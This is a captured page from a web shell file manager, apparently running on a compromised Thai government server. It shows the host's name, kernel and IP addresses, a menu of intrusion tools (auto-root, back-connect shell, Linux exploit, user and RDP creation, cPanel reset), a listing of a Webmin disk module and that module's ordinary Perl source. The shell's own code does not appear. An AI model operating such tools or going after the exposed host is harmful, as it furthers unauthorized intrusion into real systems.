Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
fdisk /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.92
KB
-rw-r--r--
acl_security.pl
1.41
KB
-rwxr-xr-x
apply_hdparm.cgi
1.17
KB
-rwxr-xr-x
blink.cgi
384
B
-rwxr-xr-x
cgi_args.pl
483
B
-rwxr-xr-x
config
13
B
-rw-r--r--
config.info
144
B
-rw-r--r--
config.info.bg
156
B
-rw-r--r--
config.info.bg.UTF-8
235
B
-rw-r--r--
config.info.ca
165
B
-rw-r--r--
config.info.ca.UTF-8
167
B
-rw-r--r--
config.info.de
152
B
-rw-r--r--
config.info.de.UTF-8
152
B
-rw-r--r--
config.info.nl
138
B
-rw-r--r--
config.info.nl.UTF-8
138
B
-rw-r--r--
config.info.no
151
B
-rw-r--r--
config.info.no.UTF-8
151
B
-rw-r--r--
defaultacl
26
B
-rw-r--r--
edit_disk.cgi
4.4
KB
-rwxr-xr-x
edit_hdparm.cgi
4.36
KB
-rwxr-xr-x
edit_part.cgi
7.71
KB
-rwxr-xr-x
edit_relabel.cgi
1.32
KB
-rwxr-xr-x
fdisk-lib.pl
47.44
KB
-rwxr-xr-x
feedback_files.pl
115
B
-rwxr-xr-x
fsck.cgi
604
B
-rwxr-xr-x
fsck_form.cgi
700
B
-rwxr-xr-x
index.cgi
2.58
KB
-rwxr-xr-x
log_parser.pl
1.53
KB
-rwxr-xr-x
make_tags.pl
210
B
-rwxr-xr-x
mkfs.cgi
820
B
-rwxr-xr-x
mkfs_form.cgi
832
B
-rwxr-xr-x
module.info
238
B
-rw-r--r--
module.info.ca
119
B
-rw-r--r--
module.info.ca.UTF-8
131
B
-rw-r--r--
module.info.cz
36
B
-rw-r--r--
module.info.cz.UTF-8
46
B
-rw-r--r--
module.info.de
131
B
-rw-r--r--
module.info.de.UTF-8
143
B
-rw-r--r--
module.info.es
38
B
-rw-r--r--
module.info.es.UTF-8
44
B
-rw-r--r--
module.info.fr
35
B
-rw-r--r--
module.info.fr.UTF-8
41
B
-rw-r--r--
module.info.hu
71
B
-rw-r--r--
module.info.hu.UTF-8
91
B
-rw-r--r--
module.info.ja_JP.UTF-8
67
B
-rw-r--r--
module.info.ja_JP.euc
49
B
-rw-r--r--
module.info.ko_KR.UTF-8
45
B
-rw-r--r--
module.info.ko_KR.euc
35
B
-rw-r--r--
module.info.ms_MY
126
B
-rw-r--r--
module.info.ms_MY.UTF-8
138
B
-rw-r--r--
module.info.nl
39
B
-rw-r--r--
module.info.nl.UTF-8
45
B
-rw-r--r--
module.info.no
42
B
-rw-r--r--
module.info.no.UTF-8
48
B
-rw-r--r--
module.info.pl
38
B
-rw-r--r--
module.info.pl.UTF-8
44
B
-rw-r--r--
module.info.pt
35
B
-rw-r--r--
module.info.pt.UTF-8
43
B
-rw-r--r--
module.info.ru.UTF-8
66
B
-rw-r--r--
module.info.ru_RU
39
B
-rw-r--r--
module.info.ru_RU.UTF-8
69
B
-rw-r--r--
module.info.ru_SU
39
B
-rw-r--r--
module.info.sv
28
B
-rw-r--r--
module.info.sv.UTF-8
34
B
-rw-r--r--
module.info.tr
32
B
-rw-r--r--
module.info.zh_CN
24
B
-rw-r--r--
module.info.zh_TW.Big5
31
B
-rw-r--r--
range.js
4.7
KB
-rw-r--r--
reboot.cgi
261
B
-rwxr-xr-x
relabel.cgi
417
B
-rwxr-xr-x
save_part.cgi
3.75
KB
-rwxr-xr-x
slider.js
14.48
KB
-rw-r--r--
timer.js
2.86
KB
-rw-r--r--
tunefs.cgi
689
B
-rwxr-xr-x
tunefs_form.cgi
722
B
-rwxr-xr-x
winclassic.css
1.72
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_disk.cgi
#!/usr/bin/perl # Show the partitions on a single disk require './fdisk-lib.pl'; &ReadParse(); &can_edit_disk($in{'device'}) || &error($text{'disk_ecannot'}); $extwidth = 300; # Get the disk @disks = &list_disks_partitions(); ($d) = grep { $_->{'device'} eq $in{'device'} } @disks; $d || &error($text{'disk_egone'}); @parts = @{$d->{'parts'}}; &ui_print_header($d->{'desc'}, $text{'disk_title'}, "", undef, @disks == 1 ? 1 : 0, @disks == 1 ? 1 : 0); # Work out links to add partitions foreach $p (@parts) { $extended++ if ($p->{'extended'}); $regular++ if (!$p->{'extended'}); if ($p->{'end'} > $d->{'cylinders'}) { $d->{'cylinders'} = $p->{'end'}; } if (!$p->{'extended'} && $stat[2] && &indexof($p->{'type'}, @space_type) >= 0 && (@space = &disk_space($p->{'device'}, $stat[0])) && $space[0]) { $p->{'free'} = sprintf "%d %%\n", 100 * $space[1] / $space[0]; $anyfree++; } } if ($regular < 4 || $disk->{'table'} ne 'msdos') { push(@edlinks, "<a href=\"edit_part.cgi?disk=$d->{'index'}&new=1\">". $text{'index_addpri'}."</a>"); } if ($extended) { push(@edlinks, "<a href=\"edit_part.cgi?disk=$d->{'index'}&new=2\">". $text{'index_addlog'}."</a>"); } elsif ($regular < 4 && &supports_extended()) { push(@edlinks, "<a href=\"edit_part.cgi?disk=$d->{'index'}&new=3\">". $text{'index_addext'}."</a>"); } if ($d->{'table'} eq 'unknown') { # Must create a partition table first @edlinks = ( $text{'disk_needtable'} ); } # Show brief disk info @info = ( ); if ($d->{'cylsize'}) { push(@info, &text('disk_dsize', &nice_size($d->{'cylinders'}*$d->{'cylsize'}))); } if ($d->{'model'}) { push(@info, &text('disk_model', $d->{'model'})); } push(@info, &text('disk_cylinders', $d->{'cylinders'})); if ($d->{'table'}) { if ($d->{'table'} eq 'unknown') { push(@info, $text{'disk_notable'}); } else { push(@info, &text('disk_table', uc($d->{'table'}))); } } print &ui_links_row(\@info),"<p>\n"; # Show table of partitions, if any if (@parts) { print &ui_links_row(\@edlinks); @tds = ( "width=5%", "width=10%", "width=45%", "width=5%", "width=5%", "width=5%", "width=15%", "width=10%" ); @tds = map { "nowrap $_" } @tds; print &ui_columns_start([ $text{'disk_no'}, $text{'disk_type'}, $text{'disk_extent'}, $text{'disk_size'}, $text{'disk_start'}, $text{'disk_end'}, $text{'disk_use'}, $anyfree ? ( $text{'disk_free'} ) : ( ), ], 100, 0, \@tds); foreach $p (@parts) { $url = "edit_part.cgi?disk=$d->{'index'}&part=$p->{'index'}"; # Create extent images $ext = ""; $ext .= sprintf "<img src=images/gap.gif height=10 width=%d>", $extwidth*($p->{'start'} - 1) / $d->{'cylinders'}; $ext .= sprintf "<img src=images/%s.gif height=10 width=%d>", $p->{'extended'} ? "ext" : "use", $extwidth*($p->{'end'} - $p->{'start'}) / $d->{'cylinders'}; $ext .= sprintf "<img src=images/gap.gif height=10 width=%d>", $extwidth*($d->{'cylinders'} - ($p->{'end'} - 1)) / $d->{'cylinders'}; # Work out usage @stat = &device_status($p->{'device'}); $stat = &device_status_link(@stat); print &ui_columns_row([ "<a href='$url'>$p->{'number'}</a>", "<a href='$url'>".($p->{'extended'} ? $text{'extended'} : &tag_name($p->{'type'}))."</a>", $ext, $p->{'size'} ? &nice_size($p->{'size'}) : &text('edit_blocks', $p->{'blocks'}), $p->{'start'}, $p->{'end'}, $stat, $anyfree ? ( $p->{'free'} ) : ( ), ], \@tds); } print &ui_columns_end(); } else { print "<b>$text{'disk_none'}</b><p>\n"; } print &ui_links_row(\@edlinks); # Buttons for IDE params and SMART print &ui_hr(); print &ui_buttons_start(); if (&supports_hdparm($d)) { print &ui_buttons_row("edit_hdparm.cgi", $text{'index_hdparm'}, $text{'index_hdparmdesc'}, &ui_hidden("disk", $d->{'index'})); } if (&supports_smart($d)) { print &ui_buttons_row("../smart-status/index.cgi", $text{'index_smart'}, $text{'index_smartdesc'}, &ui_hidden("drive", $d->{'device'})); } if (&supports_relabel($d)) { if ($d->{'table'} eq 'unknown') { print &ui_buttons_row( "edit_relabel.cgi", $text{'index_relabel2'}, $text{'index_relabeldesc2'}, &ui_hidden("device", $d->{'device'})); } else { print &ui_buttons_row( "edit_relabel.cgi", $text{'index_relabel'}, $text{'index_relabeldesc'}, &ui_hidden("device", $d->{'device'})); } } print &ui_buttons_end(); &ui_print_footer("", $text{'index_return'});
Close